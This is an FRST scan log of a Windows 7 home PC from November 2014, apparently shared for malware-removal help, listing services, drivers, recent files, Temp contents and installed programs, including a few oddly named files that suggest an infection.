R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [277032 2009-06-03] (ActivIdentity)R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07- 14] (Microsoft Corporation)R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-04-07] (Hewlett-Packard) [File not signed]S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [997664 2014-10-22] (Overwolf LTD)R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-04-07] (Hewlett-Packard) [File not signed]R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2014-02-28] ()R2 tvnserver; C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)S2 dwmrcs; No ImagePathS2 HP Health Check Service; "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe" [X]S3 hpqwmiex; "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe" [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-10] (Malwarebytes Corporation)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)S3 NAL; C:\Windows\system32\Drivers\iqvw64e.sys [32224 2009-09-21] (Intel Corporation ) [File not signed]R3 PlantronicsGC; C:\Windows\System32\drivers\PLTGC.sys [1327104 2011-11-04] (C-Media Electronics Inc)S3 PTHDRBUS; C:\Windows\System32\DRIVERS\PTHDRBUS.sys [69264 2009-12-15] (DEVGURU Co., LTD.)S3 PTHDRMDM; C:\Windows\System32\DRIVERS\PTHDRMDM.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))S3 PTHDRVSP; C:\Windows\System32\DRIVERS\PTHDRVSP.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)U3 uxryipod; \??\C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 
2014-11-10 22:57 - 2014-11-10 22:57 - 00017513 _____ () C:\Users\Calahan\Downloads\FRST.txt2014-11-10 22:43 - 2014-11-10 22:43 - 00000000 ____D () C:\Users\Calahan\Downloads\tdsskiller2014-11-10 22:42 - 2014-11-10 22:42 - 04163057 _____ () C:\Users\Calahan\Downloads\tdsskiller.zip2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe2014-11-10 21:14 - 2014-11-10 22:57 - 00000000 ____D () C:\FRST2014-11-10 21:13 - 2014-11-10 21:13 - 02116096 _____ (Farbar) C:\Users\Calahan\Downloads\FRST64.exe2014-11-10 20:59 - 2014-11-10 20:59 - 00000129 _____ () C:\Users\Calahan\Downloads\malwarebytes.txt2014-11-10 20:30 - 2014-11-10 20:31 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads \mbam_premium.exe2014-11-10 20:17 - 2014-11-10 20:16 - 00042070 _____ () C:\Users\Calahan\Downloads\NOV-10-14.xml2014-11-10 20:16 - 2014-11-10 20:16 - 00000049 _____ () C:\Users\Calahan\Downloads\NOV-10-14.txt2014-11-10 19:43 - 2014-11-10 20:56 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \MBAMSwissArmy.sys2014-11-10 19:43 - 2014-11-10 20:31 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs \Malwarebytes Anti-Malware2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware2014-11-10 19:43 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mbamchameleon.sys2014-11-10 19:43 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mwac.sys2014-11-10 19:43 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mbam.sys2014-11-10 19:41 - 2014-11-10 19:42 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads\mbam- setup-2.0.3.1025.exe2014-11-09 23:50 - 2014-11-09 23:50 - 00003056 _____ () 
C:\Windows\System32\Tasks\{44A1741A-3325-5E3D-3774- F73A5D212500}2014-11-05 16:54 - 2014-11-05 16:54 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\BMMCegjc2014-11-04 16:36 - 2014-11-04 16:36 - 00000000 ____D () C:\Users\Calahan\AppData\Local\FalloutNV2014-11-04 01:12 - 2014-11-04 01:12 - 00000000 ____D () C:\Users\Calahan\Documents\Activision2014-11-03 21:31 - 2014-11-03 21:31 - 00000209 _____ () C:\Users\Calahan\Downloads\1OVPH1R.mp42014-11-03 19:34 - 2014-11-10 19:38 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Coxoik2014-11-03 19:34 - 2014-11-03 19:36 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Kudo2014-11-03 18:39 - 2014-11-03 19:34 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-10-31 20:26 - 2014-11-02 21:02 - 00000000 ____D () C:\Users\Calahan\Documents\Prototype2014-10-30 18:17 - 2014-10-30 18:17 - 00001419 _____ () C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk2014-10-29 19:50 - 2014-09-19 19:09 - 17867776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll2014-10-29 19:50 - 2014-09-19 18:55 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll2014-10-29 19:50 - 2014-09-19 18:50 - 01385472 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll2014-10-29 19:50 - 2014-09-19 18:49 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll2014-10-29 19:50 - 2014-09-19 18:48 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl2014-10-29 19:50 - 2014-09-19 18:48 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll2014-10-29 19:50 - 2014-09-19 18:47 - 02157056 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00173056 
_____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe2014-10-29 19:50 - 2014-09-19 18:46 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb2014-10-29 19:50 - 2014-09-19 18:46 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll2014-10-29 19:50 - 2014-09-19 18:45 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll2014-10-29 19:50 - 2014-09-19 18:45 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe2014-10-29 19:50 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll2014-10-29 19:50 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll2014-10-29 19:50 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll2014-10-29 19:50 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll2014-10-29 19:50 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl2014-10-29 19:50 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll2014-10-29 19:50 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe2014-10-29 19:50 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\vbscript.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll2014-10-29 19:50 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb2014-10-29 19:50 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe2014-10-29 19:50 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll2014-10-29 19:49 - 2014-09-19 18:54 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll2014-10-29 19:49 - 2014-09-19 18:48 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll2014-10-29 19:49 - 2014-09-19 18:47 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll2014-10-29 19:49 - 2014-09-19 18:46 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe2014-10-29 19:49 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll2014-10-29 19:49 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll2014-10-29 19:49 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe2014-10-29 19:49 - 2013-08-27 04:01 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll2014-10-29 19:49 - 2013-08-27 04:01 - 01143296 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll2014-10-29 19:49 - 2013-08-27 03:21 - 01077760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll2014-10-17 00:53 - 2014-10-17 00:53 - 00000000 ____D () C:\Users\Calahan\Downloads\Lower shadow map mod V42014-10-17 00:50 - 
2014-10-17 00:50 - 00013020 _____ () C:\Users\Calahan\Downloads\Lower shadow map mod V4.pdmod2014-10-16 23:07 - 2014-10-16 23:07 - 00000000 ____D () C:\Users\Calahan\AppData\Local\PAYDAY2014-10-16 02:39 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-10-16 02:39 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll2014-10-16 02:39 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-10-16 02:39 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-10-16 02:39 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll2014-10-16 02:39 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll2014-10-16 02:38 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll2014-10-16 02:38 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll2014-10-16 02:38 - 2014-08-28 21:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll2014-10-16 02:38 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll2014-10-16 02:38 - 2014-08-28 21:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll2014-10-16 02:38 - 2014-08-28 21:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll2014-10-16 02:38 - 2014-08-28 21:06 - 01125888 _____ (Microsoft Corporation) 
C:\Windows\system32\mstsc.exe2014-10-16 02:38 - 2014-08-28 20:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll2014-10-16 02:38 - 2014-08-28 20:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe2014-10-16 02:38 - 2014-08-28 20:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll2014-10-16 02:38 - 2014-08-28 20:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll2014-10-16 02:37 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll2014-10-16 02:37 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll2014-10-16 02:37 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll2014-10-16 02:37 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe2014-10-16 02:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll2014-10-16 02:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll2014-10-16 02:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll2014-10-16 02:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll2014-10-16 02:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys2014-10-16 02:37 - 
2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers \tssecsrv.sys2014-10-15 18:51 - 2014-10-15 18:52 - 00863820 _____ () C:\Users\Calahan\Downloads\Nosferatu.7z2014-10-12 01:05 - 2014-10-12 01:05 - 00000000 ____D () C:\Users\Calahan\AppData\Local\IsolatedStorage ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-10 22:45 - 2013-09-17 13:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-11-10 22:25 - 2013-09-18 10:42 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2014-11-10 20:54 - 2011-05-31 15:30 - 00001945 _____ () C:\Windows\epplauncher.mif2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327- 5P-1.C7483456-A289-439d-8115-601632D005A02014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327- 5P-0.C7483456-A289-439d-8115-601632D005A02014-11-10 20:25 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI2014-11-10 20:24 - 2011-05-26 18:45 - 01295483 _____ () C:\Windows\WindowsUpdate.log2014-11-10 20:21 - 2014-06-28 01:20 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Raptr2014-11-10 20:18 - 2013-09-18 10:42 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2014-11-10 20:18 - 2011-05-26 19:15 - 00485104 _____ () C:\Windows\PFRO.log2014-11-10 20:18 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-11-10 20:18 - 2009-07-13 23:51 - 00057091 _____ () C:\Windows\setupact.log2014-11-10 20:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Resources2014-11-10 19:28 - 2013-12-30 18:00 - 00000000 ____D () C:\Program Files (x86)\Steam2014-11-10 19:11 - 2014-06-25 17:33 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Skype2014-11-10 18:53 - 2014-02-28 16:31 - 00000000 ____D () 
C:\Users\Calahan\AppData\Local\CrashDumps
2014-11-04 16:36 - 2014-02-28 16:37 - 00000000 ____D () C:\Users\Calahan\Documents\My Games
2014-11-04 16:36 - 2014-02-28 16:23 - 00545972 _____ () C:\Windows\DirectX.log
2014-11-04 15:59 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-11-02 23:25 - 2014-06-30 17:19 - 00000000 ____D () C:\Program Files (x86)\Overwolf
2014-10-30 21:35 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-30 18:18 - 2014-06-30 17:18 - 00000000 ____D () C:\Users\Calahan\AppData\Local\Overwolf
2014-10-30 06:25 - 2011-05-26 16:47 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-29 11:26 - 2013-09-18 10:43 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-21 12:20 - 2013-09-18 10:42 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 12:20 - 2013-09-18 10:42 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 22:58 - 2014-10-07 22:24 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Mount&Blade With Fire and Sword
2014-10-20 15:02 - 2014-06-27 21:05 - 00000000 ____D () C:\Users\Calahan\Downloads\pdmod_tool_v1.15_fix1
2014-10-17 03:50 - 2009-07-13 23:45 - 00416704 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 03:50 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 03:48 - 2014-05-15 02:26 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-17 02:19 - 2011-05-26 17:08 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-17 02:14 - 2013-09-17 12:32 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 02:00 - 2011-05-31 15:31 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 18:06 - 2009-07-14 00:08 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

Some content of TEMP:
====================
C:\Users\administrator\AppData\Local\Temp\ApnStub.exe
C:\Users\administrator\AppData\Local\Temp\HPHASUtil.exe
C:\Users\administrator\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\administrator\AppData\Local\Temp\MSN874A.exe
C:\Users\administrator\AppData\Local\Temp\uninstall.exe
C:\Users\administrator\AppData\Local\Temp\UninstallHPTCA.exe
C:\Users\Administrator.cvci20462\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\Calahan\AppData\Local\Temp\raptrpatch.exe
C:\Users\Calahan\AppData\Local\Temp\raptr_stub.exe
C:\Users\Calahan\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Calahan\AppData\Local\Temp\stuprt.exe
C:\Users\Calahan\AppData\Local\Temp\xmlUpdater.exe
C:\Users\Logan\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\appupdater-{835E6293-B3C4-B247-9C49-3213713F7FC7}.exe
C:\Users\Mike2\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 09:18

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014
Ran by Calahan at 2014-11-10 22:58:19
Running from C:\Users\Calahan\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

0RBITALIS (HKLM-x32\...\Steam App 278440) (Version: - Alan Zucconi)
140 (HKLM-x32\...\Steam App 242820) (Version: - Carlsen Games)
3079 -- Block Action RPG (HKLM-x32\...\Steam App 259620) (Version: - Phr00t's Software)
3089 -- Futuristic Action RPG (HKLM-x32\...\Steam App 263360) (Version: - Phr00t's Software)
6180 the moon (HKLM-x32\...\Steam App 299660) (Version: - Turtle Cream)
64 Bit HP CIO Components Installer (Version: 7.2.5 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
7-Zip 9.22beta (HKLM-x32\...\7-Zip) (Version: - )
8BitMMO (HKLM-x32\...\Steam App 250420) (Version: - Archive Entertainment)
A Wizard's Lizard (HKLM-x32\...\Steam App 280040) (Version: - Lost Decade Games)
Actify SpinFire 9.0 (HKLM-x32\...\Actify SpinFire 9.0) (Version: 11.0.1435.1507.3 - Actify, Inc.)
Actify SpinFire 9.0 (x32 Version: 11.0.1435.1507.3 - Actify Inc) Hidden
ActivClient x64 (HKLM\...\{86E45973-5352-439F-A115-2E8EE4D40140}) (Version: 6.2 - ActivIdentity)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Alan Wake (HKLM-x32\...\Steam App 108710) (Version: - Remedy Entertainment)
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Another World (HKLM-x32\...\Steam App 233550) (Version: - Eric Chahi)
Anzio Lite 12.6 (HKLM-x32\...\{1F938630-5205-4C8C-81EA-D9ECFC8CA507}) (Version: - )
ATI Problem Report Wizard (Version: 3.0.750.0 - ATI Technologies) Hidden
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Bastion (HKLM-x32\...\Steam App 107100) (Version: - Supergiant Games)
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
Breach & Clear (HKLM-x32\...\Steam App 266130) (Version: - Mighty Rabbit Studios)
calibre (HKLM-x32\...\{D0940326-79BF-4D05-98CA-ED208661D34B}) (Version: 1.19.0 - Kovid Goyal)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Caribbean! (HKLM-x32\...\Steam App 293010) (Version: - Snowbird Games)
Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version: - FromSoftware)
DARK SOULS™ II (HKLM-x32\...\Steam App 236430) (Version: - FromSoftware, Inc)
Darwinia (HKLM-x32\...\Steam App 1500) (Version: - Introversion Software)
DriverTuner 3.5.0.1 (HKLM-x32\...\{520C1D80-935C-42B9-9340-E883849D804F}_is1) (Version: 3.5.0.1 - LionSea Software co., ltd)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FAHClient (HKLM-x32\...\FAHClient) (Version: 7.3.6 - Stanford University)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
FileZilla Client 3.5.2 (HKLM-x32\...\FileZilla Client) (Version: 3.5.2 - FileZilla Project)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Gunpoint (HKLM-x32\...\Steam App 206190) (Version: - Suspicious Developments)
Hack 'n' Slash (HKLM-x32\...\Steam App 246070) (Version: - Double Fine Productions)
Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - )
Hero of Many (HKLM-x32\...\Steam App 297370) (Version: - Trickster Arts)
Hotline Miami (HKLM-x32\...\Steam App 219150) (Version: - Dennaton Games)
HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) Hidden
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.7.0 - LIGHTNING UK!)
Infested Planet (HKLM-x32\...\Steam App 204530) (Version: - Rocket Bear Games)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Network Connections 14.6.10.0 (HKLM\...\PROSetDX) (Version: 14.6.10.0 - Intel)
